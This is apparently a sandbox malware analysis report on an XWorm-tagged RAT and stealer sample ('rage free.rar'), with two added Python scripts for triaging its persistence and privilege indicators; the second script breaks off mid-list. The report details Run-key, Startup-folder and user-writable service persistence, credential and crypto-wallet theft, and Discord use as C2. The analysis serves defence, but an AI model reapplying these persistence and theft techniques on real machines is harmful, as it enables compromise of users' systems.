Malware Analysis Report

2024-11-30 04:11

Sample ID 240408-a84lsabh56
Target rage free.rar
SHA256 b4da01818ad42712ce44298b148f94971ee4a2e0fff1b6f97f09955b9ba8c059
Tags
xworm persistence pyinstaller rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b4da01818ad42712ce44298b148f94971ee4a2e0fff1b6f97f09955b9ba8c059

Threat Level: Known bad

The file rage free.rar was found to be: Known bad.

Malicious Activity Summary

xworm persistence pyinstaller rat spyware stealer trojan upx

Xworm

Detect Xworm Payload

NirSoft WebBrowserPassView

Nirsoft

Downloads MZ/PE file

Sets service image path in registry

Executes dropped EXE

UPX packed file

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Detects videocard installed

Modifies registry class

Uses Task Scheduler COM API

Runs net.exe

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Gathers system information

Enumerates processes with tasklist

NTFS ADS

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-08 00:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-08 00:53

Reported

2024-04-08 01:27

Platform

win10v2004-20231215-en

Max time kernel

1799s

Max time network

1798s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\rage free.rar"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lBmHlTePJveVGiHnIonWMPc\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lBmHlTePJveVGiHnIonWMPc" C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VPkrhDddTg\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VPkrhDddTg" C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\rage free\Injector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\injector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\rage free\Injector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\injector.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe C:\Users\Admin\AppData\Roaming\creal.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe C:\Users\Admin\AppData\Roaming\creal.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\rage free\Injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Desktop\rage free\Injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI42562\getPass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI55522\getPass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A (x23, consecutive identical rows collapsed)

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A (x64, identical rows collapsed; the report gives no DLL names)

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (x58, identical rows collapsed; the report gives no per-file details for the UPX matches)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windowshalper(legit) = "C:\\Users\\Admin\\AppData\\Roaming\\Windowshalper(legit).exe" C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
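The three persistence rows above (service ImagePath, Startup folder, Run key) share one trait that separates them from a normal software install: every location they point at or write to is under the user's own profile, so planting them needed no admin rights. The following script is an added example, not part of the report or of the sandbox vendor's tooling. It parses rows in the report's "Description Indicator Process Target" layout, normalises the escaped registry values, and tags each persistence entry with an ATT&CK technique ID and a user-writable flag. The malicious rows are copied from the report; the two rows marked BENIGN are constructed for contrast, and the ATT&CK mapping and the user-writable heuristic are the author's.

```python
"""Classify persistence indicators in a sandbox report's signature rows.

Added example, not part of the report or the sandbox vendor's tooling.
Input rows follow the report's "Description Indicator Process Target" layout.
The malicious rows below are copied from the report above; the two rows
marked BENIGN are constructed for contrast. The ATT&CK IDs and the
"user-writable location" heuristic are the author's mapping.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Registry rows:  Set value (type) <key> = "<value>" <process> <target>
REG_ROW = re.compile(
    r'^Set value \(\w+\) (?P<key>\S+) = "(?P<value>[^"]*)" (?P<process>.+?) (?P<target>\S+)$'
)
# File rows:  <description> <path> <process> <target>. Paths may contain
# spaces, so the process column is anchored on its drive letter.
FILE_ROW = re.compile(
    r"^(?P<desc>File created|File opened for modification) "
    r"(?P<path>.+?) (?P<process>[A-Za-z]:\\.+?) (?P<target>\S+)$"
)

SERVICE_KEY = re.compile(r"\\Services\\[^\\]+\\ImagePath$", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)

# Directories a standard user can write to. A service ImagePath, Run value or
# Startup entry pointing here needs no admin rights to plant, which is what
# separates the rows in this report from ordinary software installs.
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I
)


@dataclass(frozen=True)
class Finding:
    technique: str      # ATT&CK Enterprise technique ID
    mechanism: str
    location: str       # normalised path the entry points at or was written to
    process: str        # process that created the entry
    user_writable: bool


def _normalise(path: str) -> str:
    # The sandbox escapes backslashes inside quoted registry values and keeps
    # the NT-native "\??\" prefix; undo both so one set of regexes applies.
    path = path.replace("\\\\", "\\")
    return path[4:] if path.startswith("\\??\\") else path


def classify_row(row: str) -> Finding | None:
    m = REG_ROW.match(row)
    if m:
        key, value, proc = m["key"], _normalise(m["value"]), m["process"]
        if SERVICE_KEY.search(key):
            return Finding("T1543.003", "service ImagePath", value, proc,
                           bool(USER_WRITABLE.match(value)))
        if RUN_KEY.search(key):
            return Finding("T1547.001", "Run key", value, proc,
                           bool(USER_WRITABLE.match(value)))
        return None
    m = FILE_ROW.match(row)
    if m and m["desc"] == "File created":
        path, proc = _normalise(m["path"]), m["process"]
        if STARTUP_DIR.search(path):
            return Finding("T1547.001", "Startup folder", path, proc,
                           bool(USER_WRITABLE.match(path)))
    return None


def triage(rows: list[str]) -> list[Finding]:
    """All persistence findings, in row order."""
    return [f for f in map(classify_row, rows) if f is not None]


def suspicious(rows: list[str]) -> list[Finding]:
    """Findings whose location a standard user could have written."""
    return [f for f in triage(rows) if f.user_writable]


SAMPLE_ROWS = [
    # Copied from the report above.
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lBmHlTePJveVGiHnIonWMPc\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lBmHlTePJveVGiHnIonWMPc" C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VPkrhDddTg\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VPkrhDddTg" C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windowshalper(legit) = "C:\\Users\\Admin\\AppData\\Roaming\\Windowshalper(legit).exe" C:\Users\Admin\AppData\Roaming\Nothere.exe N/A',
    r"File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe C:\Users\Admin\AppData\Roaming\creal.exe N/A",
    r"File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk C:\Users\Admin\AppData\Roaming\Nothere.exe N/A",
    # BENIGN, constructed: a service under System32 and a plain registry read.
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ExampleSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k netsvcs" C:\Windows\System32\services.exe N/A',
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Windows\System32\cmd.exe N/A",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        flag = "USER-WRITABLE" if f.user_writable else "system location"
        print(f"{f.technique} {f.mechanism:<18} {flag:<15} {f.location}  <- {f.process}")
```

Run as-is it prints six findings, five of them user-writable; the constructed System32 service is reported but not flagged. The same regexes apply to rows copied from any report in this layout, so the script can be pointed at a whole signature section rather than the handful of rows embedded here.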

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A (x59, identical rows collapsed)

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SoftwareDistribution\Download\qOTtu.exe C:\Users\Admin\AppData\Roaming\injector.exe N/A
File created C:\Windows\SoftwareDistribution\Download\q8q5y.exe C:\Users\Admin\AppData\Roaming\injector.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{95C05F79-8320-4FBB-9BCD-666A7DF3FCDB} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{12C6F3AF-6270-4AB8-BFB0-A6A5203BBF31} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 101396.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x8, consecutive identical rows collapsed)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (x11, consecutive identical rows collapsed)
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A (x7, consecutive identical rows collapsed)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x4, consecutive identical rows collapsed)
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A (x12, consecutive identical rows collapsed)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A (x2, consecutive identical rows collapsed)
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A (x20, consecutive identical rows collapsed)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
N/A N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (x37, identical rows collapsed)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
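Two things in the table above are easy to miss when reading it by eye. First, the sandbox prints a bare number where it has no name for a privilege; 33 through 36 are the well-known LUIDs that winnt.h assigns after SeManageVolumePrivilege (28), so "Token: 35" on 7zFM.exe is SeCreateSymbolicLinkPrivilege, which 7-Zip enables when extracting archives. Second, the rows that matter are not the long WMIC.exe lists (a Windows tool enabling its whole privilege set is routine) but the dropped binaries: Nothere.exe and Windowshalper(legit).exe enabling SeDebugPrivilege, and qOTtu.exe and q8q5y.exe under SoftwareDistribution\Download enabling SeLoadDriverPrivilege, which matches the LoadsDriver behaviour reported for both. The script below is an added example, not from the report or the sandbox vendor: it decodes the numeric LUIDs, groups privileges per process, and ranks processes so that non-system binaries holding boundary-crossing privileges come first. The sample rows are copied from the table above; the high-risk set and the system-directory heuristic are the author's choices.

```python
"""Decode and rank the "Suspicious use of AdjustPrivilegeToken" rows.

Added example, not from the report or the sandbox vendor. Rows are copied
from the report above in the sandbox's own layout; the LUID table is the
fixed SE_*_PRIVILEGE numbering from winnt.h, and the high-risk set and the
system-directory heuristic are the author's choices.
"""
from __future__ import annotations

import re
from collections import defaultdict

# The sandbox prints a bare number when it has no name for a privilege.
# These are the winnt.h well-known LUIDs above SeManageVolumePrivilege (28).
LUID_NAMES = {
    33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege",
    35: "SeCreateSymbolicLinkPrivilege",
    36: "SeDelegateSessionUserImpersonatePrivilege",
}

# Enabling one of these lets a process cross a security boundary on its own.
HIGH_RISK = {
    "SeDebugPrivilege": "open and inject into any process",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Row layout:  Token: <privilege> <indicator> <process> <target>
ROW = re.compile(r"^Token: (?P<priv>\S+) (?P<indicator>\S+) (?P<process>.+?) (?P<target>\S+)$")

# Binaries Windows ships or that an installer placed with admin rights.
# Anything else holding a high-risk privilege deserves a look first.
SYSTEM_DIRS = re.compile(
    r"^[A-Za-z]:\\(Windows\\System32|Windows\\SysWOW64|Program Files( \(x86\))?)\\", re.I
)


def parse_row(row: str) -> tuple[str, str] | None:
    """(privilege name, process path) for one row, resolving numeric LUIDs."""
    m = ROW.match(row)
    if not m:
        return None
    priv = m["priv"]
    if priv.isdigit():
        priv = LUID_NAMES.get(int(priv), f"LUID {priv}")
    return priv, m["process"]


def privileges_by_process(rows: list[str]) -> dict[str, set[str]]:
    out: dict[str, set[str]] = defaultdict(set)
    for parsed in map(parse_row, rows):
        if parsed:
            priv, proc = parsed
            out[proc].add(priv)
    return dict(out)


def rank(rows: list[str]) -> list[tuple[str, list[str], bool]]:
    """(process, sorted high-risk privileges, outside system dirs), worst first.

    Dropped binaries come before Windows tools even with fewer privileges:
    WMIC enabling SeLoadDriverPrivilege is normal, a file in
    SoftwareDistribution\\Download doing so is not.
    """
    scored = []
    for proc, privs in privileges_by_process(rows).items():
        risky = sorted(p for p in privs if p in HIGH_RISK)
        outside = SYSTEM_DIRS.match(proc) is None
        if risky:
            scored.append((proc, risky, outside))
    scored.sort(key=lambda t: (t[2], len(t[1])), reverse=True)  # stable sort
    return scored


# Copied from the report above (a representative subset of the table).
SAMPLE_ROWS = [
    r"Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A",
    r"Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A",
    r"Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A",
    r"Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A",
    r"Token: SeLoadDriverPrivilege N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A",
    r"Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A",
    r"Token: SeLoadDriverPrivilege N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A",
    r"Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
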